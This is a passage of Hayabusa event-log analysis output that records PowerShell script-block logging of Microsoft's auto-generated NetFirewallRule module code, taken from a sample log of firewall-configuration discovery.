$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_def,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"aultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] 
[ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 